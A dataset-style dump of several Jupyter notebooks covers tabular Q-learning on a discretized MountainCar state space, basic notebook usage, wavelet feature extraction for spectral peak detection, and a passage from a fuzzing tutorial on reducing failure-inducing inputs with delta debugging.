"import matplotlib.collections as mc\n\ndef visualize_samples(samples, discretized_samples, grid, low=None, high=None):\n \"\"\"Visualize original and discretized samples on a given 2-dimensional grid.\"\"\"\n\n fig, ax = plt.subplots(figsize=(10, 10))\n \n # Show grid\n ax.xaxis.set_major_locator(plt.FixedLocator(grid[0]))\n ax.yaxis.set_major_locator(plt.FixedLocator(grid[1]))\n ax.grid(True)\n \n # If bounds (low, high) are specified, use them to set axis limits\n if low is not None and high is not None:\n ax.set_xlim(low[0], high[0])\n ax.set_ylim(low[1], high[1])\n else:\n # Otherwise use first, last grid locations as low, high (for further mapping discretized samples)\n low = [splits[0] for splits in grid]\n high = [splits[-1] for splits in grid]\n\n # Map each discretized sample (which is really an index) to the center of corresponding grid cell\n grid_extended = np.hstack((np.array([low]).T, grid, np.array([high]).T)) # add low and high ends\n grid_centers = (grid_extended[:, 1:] + grid_extended[:, :-1]) / 2 # compute center of each grid cell\n locs = np.stack(grid_centers[i, discretized_samples[:, i]] for i in range(len(grid))).T # map discretized samples\n\n ax.plot(samples[:, 0], samples[:, 1], 'o') # plot original samples\n ax.plot(locs[:, 0], locs[:, 1], 's') # plot discretized samples in mapped locations\n ax.add_collection(mc.LineCollection(list(zip(samples, locs)), colors='orange')) # add a line connecting each original-discretized sample\n ax.legend(['original', 'discretized'])\n\n \nvisualize_samples(samples, discretized_samples, grid, low, high)",
"_____no_output_____"
]
],
[
[
"Now that we have a way to discretize a state space, let's apply it to our reinforcement learning environment.",
"_____no_output_____"
]
],
[
[
"# Create a grid to discretize the state space\nstate_grid = create_uniform_grid(env.observation_space.low, env.observation_space.high, bins=(10, 10))\nstate_grid",
"_____no_output_____"
],
[
"# Obtain some samples from the space, discretize them, and then visualize them\nstate_samples = np.array([env.observation_space.sample() for i in range(10)])\ndiscretized_state_samples = np.array([discretize(sample, state_grid) for sample in state_samples])\nvisualize_samples(state_samples, discretized_state_samples, state_grid,\n env.observation_space.low, env.observation_space.high)\nplt.xlabel('position'); plt.ylabel('velocity'); # axis labels for MountainCar-v0 state space",
"_____no_output_____"
]
],
[
[
"You might notice that if you have enough bins, the discretization doesn't introduce too much error into your representation. So we may be able to now apply a reinforcement learning algorithm (like Q-Learning) that operates on discrete spaces. Give it a shot to see how well it works!\n\n### 5. Q-Learning\n\nProvided below is a simple Q-Learning agent. Implement the `preprocess_state()` method to convert each continuous state sample to its corresponding discretized representation.",
"_____no_output_____"
]
],
[
[
"class QLearningAgent:\n \"\"\"Q-Learning agent that can act on a continuous state space by discretizing it.\"\"\"\n\n def __init__(self, env, state_grid, alpha=0.02, gamma=0.99,\n epsilon=1.0, epsilon_decay_rate=0.9995, min_epsilon=.01, seed=505):\n \"\"\"Initialize variables, create grid for discretization.\"\"\"\n # Environment info\n self.env = env\n self.state_grid = state_grid\n self.state_size = tuple(len(splits) + 1 for splits in self.state_grid) # n-dimensional state space\n self.action_size = self.env.action_space.n # 1-dimensional discrete action space\n self.seed = np.random.seed(seed)\n print(\"Environment:\", self.env)\n print(\"State space size:\", self.state_size)\n print(\"Action space size:\", self.action_size)\n \n # Learning parameters\n self.alpha = alpha # learning rate\n self.gamma = gamma # discount factor\n self.epsilon = self.initial_epsilon = epsilon # initial exploration rate\n self.epsilon_decay_rate = epsilon_decay_rate # how quickly should we decrease epsilon\n self.min_epsilon = min_epsilon\n \n # Create Q-table\n self.q_table = np.zeros(shape=(self.state_size + (self.action_size,)))\n print(\"Q table size:\", self.q_table.shape)\n\n def preprocess_state(self, state):\n \"\"\"Map a continuous state to its discretized representation.\"\"\"\n # TODO: Implement this\n pass\n\n def reset_episode(self, state):\n \"\"\"Reset variables for a new episode.\"\"\"\n # Gradually decrease exploration rate\n self.epsilon *= self.epsilon_decay_rate\n self.epsilon = max(self.epsilon, self.min_epsilon)\n\n # Decide initial action\n self.last_state = self.preprocess_state(state)\n self.last_action = np.argmax(self.q_table[self.last_state])\n return self.last_action\n \n def reset_exploration(self, epsilon=None):\n \"\"\"Reset exploration rate used when training.\"\"\"\n self.epsilon = epsilon if epsilon is not None else self.initial_epsilon\n\n def act(self, state, reward=None, done=None, mode='train'):\n \"\"\"Pick next action and update internal Q table (when mode != 'test').\"\"\"\n state = self.preprocess_state(state)\n if mode == 'test':\n # Test mode: Simply produce an action\n action = np.argmax(self.q_table[state])\n else:\n # Train mode (default): Update Q table, pick next action\n # Note: We update the Q table entry for the *last* (state, action) pair with current state, reward\n self.q_table[self.last_state + (self.last_action,)] += self.alpha * \\\n (reward + self.gamma * max(self.q_table[state]) - self.q_table[self.last_state + (self.last_action,)])\n\n # Exploration vs. exploitation\n do_exploration = np.random.uniform(0, 1) < self.epsilon\n if do_exploration:\n # Pick a random action\n action = np.random.randint(0, self.action_size)\n else:\n # Pick the best action from Q table\n action = np.argmax(self.q_table[state])\n\n # Roll over current state, action for next step\n self.last_state = state\n self.last_action = action\n return action\n\n \nq_agent = QLearningAgent(env, state_grid)",
"_____no_output_____"
]
],
[
[
"Let's also define a convenience function to run an agent on a given environment. When calling this function, you can pass in `mode='test'` to tell the agent not to learn.",
"_____no_output_____"
]
],
[
[
"def run(agent, env, num_episodes=20000, mode='train'):\n \"\"\"Run agent in given reinforcement learning environment and return scores.\"\"\"\n scores = []\n max_avg_score = -np.inf\n for i_episode in range(1, num_episodes+1):\n # Initialize episode\n state = env.reset()\n action = agent.reset_episode(state)\n total_reward = 0\n done = False\n\n # Roll out steps until done\n while not done:\n state, reward, done, info = env.step(action)\n total_reward += reward\n action = agent.act(state, reward, done, mode)\n\n # Save final score\n scores.append(total_reward)\n \n # Print episode stats\n if mode == 'train':\n if len(scores) > 100:\n avg_score = np.mean(scores[-100:])\n if avg_score > max_avg_score:\n max_avg_score = avg_score\n\n if i_episode % 100 == 0:\n print(\"\\rEpisode {}/{} | Max Average Score: {}\".format(i_episode, num_episodes, max_avg_score), end=\"\")\n sys.stdout.flush()\n\n return scores\n\nscores = run(q_agent, env)",
"_____no_output_____"
]
],
[
[
"The best way to analyze if your agent was learning the task is to plot the scores. It should generally increase as the agent goes through more episodes.",
"_____no_output_____"
]
],
[
[
"# Plot scores obtained per episode\nplt.plot(scores); plt.title(\"Scores\");",
"_____no_output_____"
]
],
[
[
"If the scores are noisy, it might be difficult to tell whether your agent is actually learning. To find the underlying trend, you may want to plot a rolling mean of the scores. Let's write a convenience function to plot both raw scores as well as a rolling mean.",
"_____no_output_____"
]
],
[
[
"def plot_scores(scores, rolling_window=100):\n \"\"\"Plot scores and optional rolling mean using specified window.\"\"\"\n plt.plot(scores); plt.title(\"Scores\");\n rolling_mean = pd.Series(scores).rolling(rolling_window).mean()\n plt.plot(rolling_mean);\n return rolling_mean\n\nrolling_mean = plot_scores(scores)",
"_____no_output_____"
]
],
[
[
"You should observe the mean episode scores go up over time. Next, you can freeze learning and run the agent in test mode to see how well it performs.",
"_____no_output_____"
]
],
[
[
"# Run in test mode and analyze scores obtained\ntest_scores = run(q_agent, env, num_episodes=100, mode='test')\nprint(\"[TEST] Completed {} episodes with avg. score = {}\".format(len(test_scores), np.mean(test_scores)))\n_ = plot_scores(test_scores, rolling_window=10)",
"_____no_output_____"
]
],
[
[
"It's also interesting to look at the final Q-table that is learned by the agent. Note that the Q-table is of size MxNxA, where (M, N) is the size of the state space, and A is the size of the action space. We are interested in the maximum Q-value for each state, and the corresponding (best) action associated with that value.",
"_____no_output_____"
]
],
[
[
"def plot_q_table(q_table):\n \"\"\"Visualize max Q-value for each state and corresponding action.\"\"\"\n q_image = np.max(q_table, axis=2) # max Q-value for each state\n q_actions = np.argmax(q_table, axis=2) # best action for each state\n\n fig, ax = plt.subplots(figsize=(10, 10))\n cax = ax.imshow(q_image, cmap='jet');\n cbar = fig.colorbar(cax)\n for x in range(q_image.shape[0]):\n for y in range(q_image.shape[1]):\n ax.text(x, y, q_actions[x, y], color='white',\n horizontalalignment='center', verticalalignment='center')\n ax.grid(False)\n ax.set_title(\"Q-table, size: {}\".format(q_table.shape))\n ax.set_xlabel('position')\n ax.set_ylabel('velocity')\n\n\nplot_q_table(q_agent.q_table)",
"_____no_output_____"
]
],
[
[
"### 6. Modify the Grid\n\nNow it's your turn to play with the grid definition and see what gives you optimal results. Your agent's final performance is likely to get better if you use a finer grid, with more bins per dimension, at the cost of higher model complexity (more parameters to learn).",
"_____no_output_____"
]
],
[
[
"# TODO: Create a new agent with a different state space grid\nstate_grid_new = create_uniform_grid(?, ?, bins=(?, ?))\nq_agent_new = QLearningAgent(env, state_grid_new)\nq_agent_new.scores = [] # initialize a list to store scores for this agent",
"_____no_output_____"
],
[
"# Train it over a desired number of episodes and analyze scores\n# Note: This cell can be run multiple times, and scores will get accumulated\nq_agent_new.scores += run(q_agent_new, env, num_episodes=50000) # accumulate scores\nrolling_mean_new = plot_scores(q_agent_new.scores)",
"_____no_output_____"
],
[
"# Run in test mode and analyze scores obtained\ntest_scores = run(q_agent_new, env, num_episodes=100, mode='test')\nprint(\"[TEST] Completed {} episodes with avg. score = {}\".format(len(test_scores), np.mean(test_scores)))\n_ = plot_scores(test_scores)",
"_____no_output_____"
],
[
"# Visualize the learned Q-table\nplot_q_table(q_agent_new.q_table)",
"_____no_output_____"
]
],
[
[
"### 7. Watch a Smart Agent",
"_____no_output_____"
]
],
[
[
"state = env.reset()\nscore = 0\nfor t in range(200):\n action = q_agent_new.act(state, mode='test')\n env.render()\n state, reward, done, _ = env.step(action)\n score += reward\n if done:\n break \nprint('Final score:', score)\nenv.close()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70761251cc9e4649acb32be3bd5825d7d8c7d31 | 2,721 | ipynb | Jupyter Notebook | first_notebook.ipynb | hakimyameen/LearnDataScience | db94eaf19c5690d3b60ff28730c322da41a00240 | [
"BSD-2-Clause"
] | null | null | null | first_notebook.ipynb | hakimyameen/LearnDataScience | db94eaf19c5690d3b60ff28730c322da41a00240 | [
"BSD-2-Clause"
] | null | null | null | first_notebook.ipynb | hakimyameen/LearnDataScience | db94eaf19c5690d3b60ff28730c322da41a00240 | [
"BSD-2-Clause"
] | null | null | null | 2,721 | 2,721 | 0.673282 | [
[
[
"print('Hello world')",
"_____no_output_____"
],
[
"print(1233454656)",
"_____no_output_____"
],
[
"a = 22",
"_____no_output_____"
],
[
"a",
"_____no_output_____"
],
[
"b = 123",
"_____no_output_____"
],
[
"b",
"_____no_output_____"
],
[
"a",
"_____no_output_____"
],
[
"b",
"_____no_output_____"
]
],
[
[
"print('This is markdown')",
"_____no_output_____"
]
],
[
[
"This is RawNB convert\nThis is RawNB convert\nThis is RawNB convert\nThis is RawNB convert\nThis is RawNB convert\nadd new things\nin \nit",
"_____no_output_____"
]
],
[
[
"# Heading / title",
"_____no_output_____"
],
[
"## Heading title",
"_____no_output_____"
],
[
"### Heading",
"_____no_output_____"
],
[
"#### Heading",
"_____no_output_____"
],
[
"###### Heading",
"_____no_output_____"
],
[
"####### Heading",
"_____no_output_____"
],
[
"# Shortcut for heading- use numeric keys 1-6",
"_____no_output_____"
]
],
[
[
"Insert cell below: select the cell and press key char. b",
"_____no_output_____"
],
[
"insert cell above:select the cell and press key char. a",
"_____no_output_____"
],
[
"WHen we want to delet cell then select cell and press x",
"_____no_output_____"
]
],
[
[
"print()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"raw",
"markdown",
"code",
"raw"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"raw"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"raw"
]
] |
e70781151dd7b017045e17c9b8cddd9b329b24ad | 104,140 | ipynb | Jupyter Notebook | notebooks/02-feature-extraction.ipynb | brunoarine/ML-peak-detection | 715709fd4bc3466d41a93de09751b8b3e6c16e76 | [
"BSD-3-Clause"
] | null | null | null | notebooks/02-feature-extraction.ipynb | brunoarine/ML-peak-detection | 715709fd4bc3466d41a93de09751b8b3e6c16e76 | [
"BSD-3-Clause"
] | null | null | null | notebooks/02-feature-extraction.ipynb | brunoarine/ML-peak-detection | 715709fd4bc3466d41a93de09751b8b3e6c16e76 | [
"BSD-3-Clause"
] | null | null | null | 456.754386 | 40,940 | 0.94252 | [
[
[
"import os\nimport sys\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\nimport pickle\nimport gzip\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom sklearn import linear_model\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler \nfrom sklearn.ensemble import RandomForestClassifier\nfrom helpers import plotcfg\nfrom helpers import preprocessing\n",
"_____no_output_____"
],
[
"X, y, d = pickle.load(gzip.open('../data/artificial.pickle', 'rb'), encoding='latin1')",
"_____no_output_____"
]
],
[
[
"## Getting rid of the baseline and extracting new features\n\nThe different intensities of the continuum in the spectra, which may come from different interferences in the samples, hinder the performance of the ML models if they are not corrected. Furthermore, we could make use of some of the signal processing toolkit that could give the machine learning model novel insights about the spectrum. Therefore, I decided to use a **wavelet transform** (and the Ricker operator) which will both flat out the different baseline heights, and will generate new data for the model.\n",
"_____no_output_____"
]
],
[
[
"sig = X[0]\nmaxwidth = 5 \nwidths = np.arange(1, maxwidth)\ncwtmatr = signal.cwt(sig, signal.ricker, widths)",
"_____no_output_____"
],
[
"plt.figure(figsize=(8,4))\na = 10\npoints = 100\nvec2 = signal.ricker(points, a)\nplt.plot(vec2, color='black')\nplt.show()",
"_____no_output_____"
]
],
[
[
"Say hello to my magical Mexican hat.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(10,4))\nplt.subplot(1,2,1)\nplt.plot(sig, color=\"black\")\nplt.xlim(0,100)\nplt.ylim(0,200)\nplt.ylabel('Counts')\nplt.xlabel('Channel')\n\nplt.subplot(1,2,2)\nplt.imshow(cwtmatr, extent=[0, 100, maxwidth, 1], cmap='viridis', aspect='auto',\n vmax=abs(cwtmatr).max(), vmin=-abs(cwtmatr).max())\nplt.yticks(np.arange(1,6),np.arange(1,6))\nplt.ylabel('Width')\nplt.xlabel('Channel')\n\n\nplt.subplots_adjust(wspace=0.3, hspace=0.4)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Example of the original signal (left), and the same signal after the wavelet transform (right).",
"_____no_output_____"
],
[
"## Dimensionality reduction\n\nThe dimensionality reduction of the model was made through the selection of the most relevant input parameters, discarding the redundant parameters that do not contribute to the performance of the AI model. For this task, a random forest was used.",
"_____no_output_____"
]
],
[
[
"forest = RandomForestClassifier()\nx_cwt = preprocessing.Cwt().transform(X)\nforest.fit(x_cwt, y)\nimportances = forest.feature_importances_",
"_____no_output_____"
],
[
"plt.figure(figsize=(10,4))\nplt.subplot(1,2,1)\nplt.imshow(cwtmatr, extent=[0, 100, maxwidth, 1], cmap='viridis', aspect='auto',\n vmax=abs(cwtmatr).max(), vmin=-abs(cwtmatr).max())\nplt.yticks(np.arange(1,6),np.arange(1,6))\nplt.ylabel('Width')\nplt.xlabel('Channel')\nplt.title('Wavelet map')\n\nplt.subplot(1,2,2)\nplt.imshow(importances.reshape(cwtmatr.shape), extent=[0, 100, maxwidth, 1], cmap='viridis', aspect='auto',\n vmax=importances.max(), vmin=importances.min())\n\nplt.ylabel('Width')\nplt.xlabel('Channel')\nplt.title('Feature importance')\n\nplt.subplots_adjust(wspace=0.3, hspace=0.4)\nplt.show()",
"_____no_output_____"
]
],
[
[
"After mapping out which parts of the wavelet map (left) carries the most relevant informat (right), now it's time to implement the machine learning model and see how it performs.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e70788064cc54d6015bcc64aa78e726810e564b8 | 169,427 | ipynb | Jupyter Notebook | docs/beta/notebooks/Reducer.ipynb | BharathMonash/fuzzingbook | c734bccc4515b2561f1bfa2313f73d02eede2057 | [
"MIT"
] | null | null | null | docs/beta/notebooks/Reducer.ipynb | BharathMonash/fuzzingbook | c734bccc4515b2561f1bfa2313f73d02eede2057 | [
"MIT"
] | null | null | null | docs/beta/notebooks/Reducer.ipynb | BharathMonash/fuzzingbook | c734bccc4515b2561f1bfa2313f73d02eede2057 | [
"MIT"
] | 1 | 2021-01-26T02:30:59.000Z | 2021-01-26T02:30:59.000Z | 35.107128 | 858 | 0.514428 | [
[
[
"# Reducing Failure-Inducing Inputs\n\nBy construction, fuzzers create inputs that may be hard to read. This causes issues during _debugging_, when a human has to analyze the exact cause of the failure. In this chapter, we present techniques that _automatically reduce and simplify failure-inducing inputs to a minimum_ in order to ease debugging.",
"_____no_output_____"
],
[
"**Prerequisites**\n\n* The simple \"delta debugging\" technique for reduction has no specific prerequisites.\n* As reduction is typically used together with fuzzing, reading the [chapter on basic fuzzing](Fuzzer.ipynb) is a good idea.\n* The later grammar-based techniques require knowledge on [derivation trees](GrammarFuzzer.ipynb) and [parsing](Parser.ipynb).",
"_____no_output_____"
],
[
"## Synopsis\n<!-- Automatically generated. Do not edit. -->\n\nTo [use the code provided in this chapter](Importing.ipynb), write\n\n```python\n>>> from fuzzingbook.Reducer import <identifier>\n```\n\nand then make use of the following features.\n\n\nA _reducer_ takes a failure-inducing input and reduces it to the minimum that still reproduces the failure. This chapter provides `Reducer` classes that implement such reducers.\n\nHere is a simple example: An arithmetic expression causes an error in the Python interpreter:\n\n```python\n>>> !python -c 'x = 1 + 2 * 3 / 0'\nTraceback (most recent call last):\r\n File \"<string>\", line 1, in <module>\r\nZeroDivisionError: division by zero\r\n```\nCan we reduce this input to a minimum? To use a `Reducer`, one first has to build a `Runner` whose outcome is `FAIL` if the precise error occurs. We therefore build a `ZeroDivisionRunner` whose `run()` method will specifically return a `FAIL` outcome if a `ZeroDivisionError` occurs.\n\n```python\n>>> from Fuzzer import ProgramRunner\n>>> class ZeroDivisionRunner(ProgramRunner):\n>>> \"\"\"Make outcome 'FAIL' if ZeroDivisionError occurs\"\"\"\n>>> def run(self, inp=\"\"):\n>>> result, outcome = super().run(inp)\n>>> if result.stderr.find('ZeroDivisionError') >= 0:\n>>> outcome = 'FAIL'\n>>> return result, outcome\n```\nIf we feed this expression into a `ZeroDivisionRunner`, it will produce an outcome of `FAIL` as designed.\n\n```python\n>>> python_input = \"x = 1 + 2 * 3 / 0\"\n>>> python_runner = ZeroDivisionRunner(\"python\")\n>>> result, outcome = python_runner.run(python_input)\n>>> outcome\n'FAIL'\n```\nDelta Debugging is a simple and robust reduction algorithm. We can tie a `DeltaDebuggingReducer` to this runner, and have it determine the substring that causes the `python` program to fail:\n\n```python\n>>> dd = DeltaDebuggingReducer(python_runner)\n>>> dd.reduce(python_input)\n'3/0'\n```\nThe input is reduced to the maximum: We get the essence of the division by zero.\n\n",
"_____no_output_____"
],
[
"## Why Reducing?\n\nAt this point, we have seen a number of test generation techniques that all in some form produce inputs in order to trigger failures. If they are successful – that is, the program actually fails – we must find out why the failure occurred and how to fix it.",
"_____no_output_____"
],
[
"Here's an example of such a situation. We have a class `MysteryRunner` with a `run()` method that – given its code – can occasionally fail. But under which circumstances does this actually happen? We have deliberately obscured the exact condition in order to make this non-obvious.",
"_____no_output_____"
]
],
[
[
"import bookutils",
"_____no_output_____"
],
[
"from Fuzzer import RandomFuzzer, Runner",
"_____no_output_____"
],
[
"import re",
"_____no_output_____"
],
[
"class MysteryRunner(Runner):\n def run(self, inp):\n x = inp.find(chr(0o17 + 0o31))\n y = inp.find(chr(0o27 + 0o22))\n if x >= 0 and y >= 0 and x < y:\n return (inp, Runner.FAIL)\n else:\n return (inp, Runner.PASS)",
"_____no_output_____"
]
],
[
[
"Let us fuzz the function until we find a failing input.",
"_____no_output_____"
]
],
[
[
"mystery = MysteryRunner()\nrandom_fuzzer = RandomFuzzer()\nwhile True:\n inp = random_fuzzer.fuzz()\n result, outcome = mystery.run(inp)\n if outcome == mystery.FAIL:\n break",
"_____no_output_____"
],
[
"failing_input = result\nfailing_input",
"_____no_output_____"
]
],
[
[
"Something in this input causes `MysteryRunner` to fail. But what is it?",
"_____no_output_____"
],
[
"## Manual Input Reduction\n\nOne important step in the debugging process is _reduction_ – that is, to identify those circumstances of a failure that are relevant for the failure to occur, and to _omit_ (if possible) those parts that are not. As Kernighan and Pike \\cite{Kernighan1999} put it:\n\n> For every circumstance of the problem, check whether it is relevant for the problem to occur. If it is not, remove it from the problem report or the test case in question.",
"_____no_output_____"
],
[
"Specifically for inputs, they suggest a _divide and conquer_ process:\n\n> Proceed by binary search. Throw away half the input and see if the output is still wrong; if not, go back to the previous state and discard the other half of the input.\n\nThis is something we can easily try out, using our last generated input:",
"_____no_output_____"
]
],
[
[
"failing_input",
"_____no_output_____"
]
],
[
[
"For instance, we can see whether the error still occurs if we only feed in the first half:",
"_____no_output_____"
]
],
[
[
"half_length = len(failing_input) // 2 # // is integer division\nfirst_half = failing_input[:half_length]\nmystery.run(first_half)",
"_____no_output_____"
]
],
[
[
"Nope – the first half alone does not suffice. Maybe the second half?",
"_____no_output_____"
]
],
[
[
"second_half = failing_input[half_length:]\nmystery.run(second_half)",
"_____no_output_____"
]
],
[
[
"This did not go so well either. We may still proceed by cutting away _smaller chunks_ – say, one character after another. If our test is deterministic and easily repeated, it is clear that this process eventually will yield a reduced input. But still, it is a rather inefficient process, especially for long inputs. What we need is a _strategy_ that effectively minimizes a failure-inducing input – a strategy that can be automated.",
"_____no_output_____"
],
[
"## Delta Debugging",
"_____no_output_____"
],
[
"One strategy to effectively reduce failure-inducing inputs is _delta debugging_ \\cite{Zeller2002}. Delta Debugging implements the \"binary search\" strategy, as listed above, but with a twist: If neither half fails (also as above), it keeps on cutting away smaller and smaller chunks from the input, until it eliminates individual characters. Thus, after cutting away the first half, we cut away\nthe first quarter, the second quarter, and so on.",
"_____no_output_____"
],
[
"Let us illustrate this on our example, and see what happens if we cut away the first quarter.",
"_____no_output_____"
]
],
[
[
"quarter_length = len(failing_input) // 4\ninput_without_first_quarter = failing_input[quarter_length:]\nmystery.run(input_without_first_quarter)",
"_____no_output_____"
]
],
[
[
"Ah! This has failed, and reduced our failing input by 25%. Let's remove another quarter.",
"_____no_output_____"
]
],
[
[
"input_without_first_and_second_quarter = failing_input[quarter_length * 2:]\nmystery.run(input_without_first_and_second_quarter)",
"_____no_output_____"
]
],
[
[
"This is not too surprising, as we had that one before:",
"_____no_output_____"
]
],
[
[
"second_half",
"_____no_output_____"
],
[
"input_without_first_and_second_quarter",
"_____no_output_____"
]
],
[
[
"How about removing the third quarter, then?",
"_____no_output_____"
]
],
[
[
"input_without_first_and_third_quarter = failing_input[quarter_length:\n quarter_length * 2] + failing_input[quarter_length * 3:]\nmystery.run(input_without_first_and_third_quarter)",
"_____no_output_____"
]
],
[
[
"Ok. Let us remove the fourth quarter.",
"_____no_output_____"
]
],
[
[
"input_without_first_and_fourth_quarter = failing_input[quarter_length:quarter_length * 3]\nmystery.run(input_without_first_and_fourth_quarter)",
"_____no_output_____"
]
],
[
[
"Yes! This has succeeded. Our input is now 50% smaller.",
"_____no_output_____"
],
[
"We have now tried to remove pieces that make up $\\frac{1}{2}$ and $\\frac{1}{4}$ of the original failing string. In the next iteration, we would go and remove even smaller pieces – $\\frac{1}{8}$, $\\frac{1}{16}$ and so on. We continue until we are down to $\\frac{1}{97}$ – that is, individual characters.",
"_____no_output_____"
],
[
"However, this is something we happily let a computer do for us. We first introduce a `Reducer` class as an abstract superclass for all kinds of reducers. The `test()` method runs a single test (with logging, if wanted); the `reduce()` method will eventually reduce an input to the minimum.",
"_____no_output_____"
]
],
[
[
"class Reducer(object):\n def __init__(self, runner, log_test=False):\n \"\"\"Attach reducer to the given `runner`\"\"\"\n self.runner = runner\n self.log_test = log_test\n self.reset()\n\n def reset(self):\n self.tests = 0\n\n def test(self, inp):\n result, outcome = self.runner.run(inp)\n self.tests += 1\n if self.log_test:\n print(\"Test #%d\" % self.tests, repr(inp), repr(len(inp)), outcome)\n return outcome\n\n def reduce(self, inp):\n self.reset()\n # Default: Don't reduce\n return inp",
"_____no_output_____"
]
],
[
[
"The `CachingReducer` variant saves test results, such that we don't have to run the same tests again and again:",
"_____no_output_____"
]
],
[
[
"class CachingReducer(Reducer):\n def reset(self):\n super().reset()\n self.cache = {}\n\n def test(self, inp):\n if inp in self.cache:\n return self.cache[inp]\n\n outcome = super().test(inp)\n self.cache[inp] = outcome\n return outcome",
"_____no_output_____"
]
],
[
[
"Here comes the _Delta Debugging_ reducer. Delta Debugging implements the strategy sketched above: It first removes larger chunks of size $\\frac{1}{2}$; if this does not fail, then we proceed to chunks of size $\\frac{1}{4}$, then $\\frac{1}{8}$ and so on.",
"_____no_output_____"
],
[
"Our implementation uses almost the same Python code as Zeller in \\cite{Zeller2002}; the only difference is that it has been adapted to work on Python 3 and our `Runner` framework. The variable `n` (initially 2) indicates the granularity – in each step, chunks of size $\\frac{1}{n}$ are cut away. If none of the test fails (`some_complement_is_failing` is False), then `n` is doubled – until it reaches the length of the input.",
"_____no_output_____"
]
],
[
[
"class DeltaDebuggingReducer(CachingReducer):\n def reduce(self, inp):\n self.reset()\n assert self.test(inp) != Runner.PASS\n\n n = 2 # Initial granularity\n while len(inp) >= 2:\n start = 0\n subset_length = len(inp) / n\n some_complement_is_failing = False\n\n while start < len(inp):\n complement = inp[:int(start)] + \\\n inp[int(start + subset_length):]\n\n if self.test(complement) == Runner.FAIL:\n inp = complement\n n = max(n - 1, 2)\n some_complement_is_failing = True\n break\n\n start += subset_length\n\n if not some_complement_is_failing:\n if n == len(inp):\n break\n n = min(n * 2, len(inp))\n\n return inp",
"_____no_output_____"
]
],
[
[
"To see how the `DeltaDebuggingReducer` works, let us run it on our failing input. With each step, we see how the remaining input gets smaller and smaller, until only two characters remain:",
"_____no_output_____"
]
],
[
[
"dd_reducer = DeltaDebuggingReducer(mystery, log_test=True)\ndd_reducer.reduce(failing_input)",
"Test #1 ' 7:,>((/$$-/->.;.=;(.%!:50#7*8=$&&=$9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+<7+1<2!4$>92+$1<(3%&5\\'\\'>#' 97 FAIL\nTest #2 '\\'<3+0-3.24#7=!&60)2/+\";+<7+1<2!4$>92+$1<(3%&5\\'\\'>#' 49 PASS\nTest #3 \" 7:,>((/$$-/->.;.=;(.%!:50#7*8=$&&=$9!%6(4=&69':\" 48 PASS\nTest #4 '50#7*8=$&&=$9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+<7+1<2!4$>92+$1<(3%&5\\'\\'>#' 73 FAIL\nTest #5 \"50#7*8=$&&=$9!%6(4=&69':<7+1<2!4$>92+$1<(3%&5''>#\" 49 PASS\nTest #6 '50#7*8=$&&=$9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+' 48 FAIL\nTest #7 '\\'<3+0-3.24#7=!&60)2/+\";+' 24 PASS\nTest #8 \"50#7*8=$&&=$9!%6(4=&69':\" 24 PASS\nTest #9 '9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+' 36 FAIL\nTest #10 '9!%6(4=&69\\':=!&60)2/+\";+' 24 FAIL\nTest #11 '=!&60)2/+\";+' 12 PASS\nTest #12 \"9!%6(4=&69':\" 12 PASS\nTest #13 '=&69\\':=!&60)2/+\";+' 18 PASS\nTest #14 '9!%6(4=!&60)2/+\";+' 18 FAIL\nTest #15 '9!%6(42/+\";+' 12 PASS\nTest #16 '9!%6(4=!&60)' 12 FAIL\nTest #17 '=!&60)' 6 PASS\nTest #18 '9!%6(4' 6 PASS\nTest #19 '6(4=!&60)' 9 FAIL\nTest #20 '6(460)' 6 FAIL\nTest #21 '60)' 3 PASS\nTest #22 '6(4' 3 PASS\nTest #23 '(460)' 5 FAIL\nTest #24 '460)' 4 PASS\nTest #25 '(0)' 3 FAIL\nTest #26 '0)' 2 PASS\nTest #27 '(' 1 PASS\nTest #28 '()' 2 FAIL\nTest #29 ')' 1 PASS\n"
]
],
[
[
"Now we know why `MysteryRunner` fails – it suffices that the input contains two matching parentheses. Delta Debugging determines this in 29 steps. Its result is _1-minimal_, meaning that every character contained is required to produce the error; removing any (as seen in tests `#27` and `#29`, above) no longer makes the test fail. This property is guaranteed by the delta debugging algorithm, which in its last stage always tries to delete characters one by one.",
"_____no_output_____"
],
[
